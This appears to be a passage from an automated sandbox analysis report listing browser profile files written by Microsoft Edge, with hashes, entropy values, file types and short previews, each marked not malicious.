                                                                                                                                          Preview:2024/04/12-09:14:39.275 1fc0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/04/12-09:14:39.276 1fc0 Recovering log #3.2024/04/12-09:14:39.277 1fc0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG.old (copy)

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:ASCII text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):352
                                                                                                                                          Entropy (8bit):5.13981698809888
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:C18BOq2P923oH+Tcwt7Uh2ghZIFUt8N18AZmw+N18BkwO923oH+Tcwt7Uh2gnLJ:CWBOv4YebIhHh2FUt8NWA/+NWB5LYebs
                                                                                                                                          MD5:0061231D0134909D4049747BF5D6BF94
                                                                                                                                          SHA1:C8463B82A6C3C6C4C1F22A6664A0B85481F49DF5
                                                                                                                                          SHA-256:A6197A098E131B9AB40120CE0AF260C5C2082FBB6A3887463F6CCAA0EB8E4200
                                                                                                                                          SHA-512:8E74B1993CCBB946A742866BD196210CF8951C3ECCE5EEEBEA6DBE25B4A8B989AE0222AEEB92F20E89E1D3C5982906F21E80BCE7C6F4766092DBACD101B0D24E
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:2024/04/12-09:14:39.275 1fc0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/04/12-09:14:39.276 1fc0 Recovering log #3.2024/04/12-09:14:39.277 1fc0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data\data_1

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:modified
                                                                                                                                          Size (bytes):270336
                                                                                                                                          Entropy (8bit):0.0018238520723782249
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:MsEllllkEthXllkl2zEflRpslX:/M/xT02zUslX
                                                                                                                                          MD5:B34AC61EC6C880EB92F256962DC7A4FB
                                                                                                                                          SHA1:30B5C233F61A2AD9662EF6A86825057D6BF3C6D9
                                                                                                                                          SHA-256:3C0ED4C8219164EF7570F3A13FB06E87A2CF978E2E93DC6DF2C35BBC04869EF1
                                                                                                                                          SHA-512:EFC918DB44923B34747D1AA84D650C47EF80D3E099CC4A6C189ACD538163A24E9EDC593476A7E2D6BA0493EA346512C8705E8A45ADA5480E0F4C6B39C14E6FB3
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):270336
                                                                                                                                          Entropy (8bit):0.0012471779557650352
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                          MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                          SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                          SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                          SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):270336
                                                                                                                                          Entropy (8bit):0.0012471779557650352
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                          MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                          SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                          SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                          SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:ASCII text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):434
                                                                                                                                          Entropy (8bit):5.230052764064237
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:CBIv4YebvqBQFUt8Ng/+NBu5LYebvqBvJ:W64YebvZg8H4LYebvk
                                                                                                                                          MD5:E3D323631F8FE60FD2CDB41313BB722E
                                                                                                                                          SHA1:ED8AD30BF6801FC04711A06E85FCA856FE35C3EB
                                                                                                                                          SHA-256:E5881BE178A4450491550B9B8A2A62C7EF158A1EAB8F8DD54F8EE003AE5CA3E2
                                                                                                                                          SHA-512:41A81E29E74DE379EB98CBF5D0C627C97CA54166885718D9E687582892E8534C02DF7F1D230249D98E87EF49794D987D93712D3550AD558E7776988D73EF091C
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:2024/04/12-09:14:40.394 1538 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/04/12-09:14:40.395 1538 Recovering log #3.2024/04/12-09:14:40.401 1538 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:ASCII text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):434
                                                                                                                                          Entropy (8bit):5.230052764064237
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:CBIv4YebvqBQFUt8Ng/+NBu5LYebvqBvJ:W64YebvZg8H4LYebvk
                                                                                                                                          MD5:E3D323631F8FE60FD2CDB41313BB722E
                                                                                                                                          SHA1:ED8AD30BF6801FC04711A06E85FCA856FE35C3EB
                                                                                                                                          SHA-256:E5881BE178A4450491550B9B8A2A62C7EF158A1EAB8F8DD54F8EE003AE5CA3E2
                                                                                                                                          SHA-512:41A81E29E74DE379EB98CBF5D0C627C97CA54166885718D9E687582892E8534C02DF7F1D230249D98E87EF49794D987D93712D3550AD558E7776988D73EF091C
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:2024/04/12-09:14:40.394 1538 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/04/12-09:14:40.395 1538 Recovering log #3.2024/04/12-09:14:40.401 1538 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\42ef1307-2683-4846-bc4b-77c8f95028a3.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2
                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:[]

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2
                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:[]

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries (copy)

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):40
                                                                                                                                          Entropy (8bit):4.1275671571169275
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                          MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                          SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                          SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                          SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Trust Tokens

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):36864
                                                                                                                                          Entropy (8bit):0.3886039372934488
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                          MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                          SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                          SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                          SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\a6418966-f90a-472b-9583-046f79727e5e.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):40
                                                                                                                                          Entropy (8bit):4.1275671571169275
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                          MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                          SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                          SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                          SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000003.log

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):80
                                                                                                                                          Entropy (8bit):3.4921535629071894
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                          MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                          SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                          SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                          SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:*...#................version.1..namespace-..&f.................&f...............

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:ASCII text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):422
                                                                                                                                          Entropy (8bit):5.231248418673043
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:CzHvv4YebvqBZFUt8NzHKZ/+NzHt5LYebvqBaJ:qX4Yebvyg8dKY/LYebvL
                                                                                                                                          MD5:09D2993B43F73624F5D2B7DDE254F18F
                                                                                                                                          SHA1:D6801B731FEBD57958A8CCB3CCBB5F636DA01F75
                                                                                                                                          SHA-256:82188CBCB9B7835A3DDF99DD21B4DB3F1FA9A19DD26CBBBC499785169E515FFF
                                                                                                                                          SHA-512:1F4D5230950ED47F1440BB71C01D89FFF172E85EAEEE88D69D8243961AECD913FE3FFA0E5E836995581F88835FC106AAA8E59C9DFA389F5235DCC78FE9DC3300
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:2024/04/12-09:14:56.820 1e30 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/04/12-09:14:56.824 1e30 Recovering log #3.2024/04/12-09:14:56.830 1e30 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG.old (copy)

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:ASCII text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):422
                                                                                                                                          Entropy (8bit):5.231248418673043
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:CzHvv4YebvqBZFUt8NzHKZ/+NzHt5LYebvqBaJ:qX4Yebvyg8dKY/LYebvL
                                                                                                                                          MD5:09D2993B43F73624F5D2B7DDE254F18F
                                                                                                                                          SHA1:D6801B731FEBD57958A8CCB3CCBB5F636DA01F75
                                                                                                                                          SHA-256:82188CBCB9B7835A3DDF99DD21B4DB3F1FA9A19DD26CBBBC499785169E515FFF
                                                                                                                                          SHA-512:1F4D5230950ED47F1440BB71C01D89FFF172E85EAEEE88D69D8243961AECD913FE3FFA0E5E836995581F88835FC106AAA8E59C9DFA389F5235DCC78FE9DC3300
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:2024/04/12-09:14:56.820 1e30 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/04/12-09:14:56.824 1e30 Recovering log #3.2024/04/12-09:14:56.830 1e30 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:ASCII text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):328
                                                                                                                                          Entropy (8bit):5.148870648472364
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:C16dvUDA9yq2P923oH+TcwtpIFUt8N16d+r1Zmw+N16d+9RkwO923oH+Tcwta/Wd:CIhyv4YebmFUt8NIa/+NIyR5LYebaUJ
                                                                                                                                          MD5:46E863324B1A5425F9FA86E40097922D
                                                                                                                                          SHA1:CC67DB67611A9AF7020C9976141132C0CC673B47
                                                                                                                                          SHA-256:F0C743C1B6B3813F2E575A40D69FF1446F669526D601F814293908DA2F2EE165
                                                                                                                                          SHA-512:AD602C478FC7D3BCBD9FCF389249F93BD7749D501956FAD292C363B91144CE47DFAE9AAC86A4F57F778E5C66796B46D1877194408E6716525561840741738D11
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:2024/04/12-09:14:39.480 1fe0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/04/12-09:14:39.481 1fe0 Recovering log #3.2024/04/12-09:14:39.481 1fe0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG.old (copy)

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:ASCII text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):328
                                                                                                                                          Entropy (8bit):5.148870648472364
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:C16dvUDA9yq2P923oH+TcwtpIFUt8N16d+r1Zmw+N16d+9RkwO923oH+Tcwta/Wd:CIhyv4YebmFUt8NIa/+NIyR5LYebaUJ
                                                                                                                                          MD5:46E863324B1A5425F9FA86E40097922D
                                                                                                                                          SHA1:CC67DB67611A9AF7020C9976141132C0CC673B47
                                                                                                                                          SHA-256:F0C743C1B6B3813F2E575A40D69FF1446F669526D601F814293908DA2F2EE165
                                                                                                                                          SHA-512:AD602C478FC7D3BCBD9FCF389249F93BD7749D501956FAD292C363B91144CE47DFAE9AAC86A4F57F778E5C66796B46D1877194408E6716525561840741738D11
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:2024/04/12-09:14:39.480 1fe0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/04/12-09:14:39.481 1fe0 Recovering log #3.2024/04/12-09:14:39.481 1fe0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Extension Settings\gallehngbfkeajggjpnehenkamehkmid\000001.dbtmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:ASCII text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):16
                                                                                                                                          Entropy (8bit):3.2743974703476995
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                          MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                          SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                          SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                          SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:MANIFEST-000001.

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Extension Settings\gallehngbfkeajggjpnehenkamehkmid\000003.log

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):95
                                                                                                                                          Entropy (8bit):4.412784353113807
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Q9b/l/tteVQgGJGRGWGUErEPxdTPqWaAWbH:K/l/tkAWYrAbLqWmbH
                                                                                                                                          MD5:CAA058376577CC122710620DAAC4BFC5
                                                                                                                                          SHA1:9EDEE556AF05810CF058E2B932DA820CFE8F03CC
                                                                                                                                          SHA-256:4E6A39E15D8657D3035B47F23E38E377166B138892DB1134FFDE91EBE9D30B55
                                                                                                                                          SHA-512:1A7CEF5FD2B721248978949A14B24194904F38ECFC0F9C567BFAFDBD231067D362BD2D0DC7AF95E150B99624AD17B1050A557B89BEDAC18A2C417EAEC33DAE96
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:&..X................uniqueIdA"3df9c1a53a3ea55a56b3b6c1a5edd4a8af3c616861fa19ce9d3382b538de991"

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Extension Settings\gallehngbfkeajggjpnehenkamehkmid\CURRENT (copy)

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:ASCII text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):16
                                                                                                                                          Entropy (8bit):3.2743974703476995
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                          MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                          SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                          SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                          SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:MANIFEST-000001.

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Extension Settings\gallehngbfkeajggjpnehenkamehkmid\LOG

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:ASCII text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):365
                                                                                                                                          Entropy (8bit):5.204267070027824
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:CzMVR1923oH+Tcwtks8Y59vsCx2KLlIYFVVq2P923oH+Tcwtks8Y59vI+IFUv:CFYebkO7VVLagVv4YebkO7A3FUv
                                                                                                                                          MD5:D56542F6A541D2124E3463BAC6479F0A
                                                                                                                                          SHA1:759AC70D3B212D7248490CE6A95D0957C3E61222
                                                                                                                                          SHA-256:977457868810BE88D3B52463847B7F430EF7C6BE6A214B5D5CF1B1D4BA3A38A0
                                                                                                                                          SHA-512:C56DF9E0DF3DBE208F13700A66BDD2B8074B92CDF8071451981EE281B7D85016478D1BEDEADB69A87CA887C998772F497E685EF19EBC7350977BEF4AB15FFD36
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:2024/04/12-09:14:44.472 1f80 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Extension Settings\gallehngbfkeajggjpnehenkamehkmid since it was missing..2024/04/12-09:14:44.592 1f80 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Extension Settings\gallehngbfkeajggjpnehenkamehkmid/MANIFEST-000001.

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Extension Settings\gallehngbfkeajggjpnehenkamehkmid\MANIFEST-000001

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:OpenPGP Secret Key
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):41
                                                                                                                                          Entropy (8bit):4.704993772857998
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                          MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                          SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                          SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                          SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):196608
                                                                                                                                          Entropy (8bit):1.264601176885529
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:384:8/2qOB1nxCkMMSAELyKOMq+8yC8F/YfU5m+OlTLVum15:Bq+n0JM9ELyKOMq+8y9/Owm5
                                                                                                                                          MD5:EA8A0834BFEAFF15F1C019608E88E5F8
                                                                                                                                          SHA1:EECC25659870B13FF7D1C0EBFADC4B7CABA7DB1E
                                                                                                                                          SHA-256:2D468ED79BD89CB47471B6F7D72687D5A95B3911F3D4B01CFCD09394201C9F81
                                                                                                                                          SHA-512:698285691DF9EAC3BF1CFA2644A2643E2C43D0112D8B58ADBF60CACD2A60723AB5DEC71FF3902DAC1A368B63BB3E61CB330B9C89C7D92ECA6834647C7B740D82
                                                                                                                                          Malicious:false
